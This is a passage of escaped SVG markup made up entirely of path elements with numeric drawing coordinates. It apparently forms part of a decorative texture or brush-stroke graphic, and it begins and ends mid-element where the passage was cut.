d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path 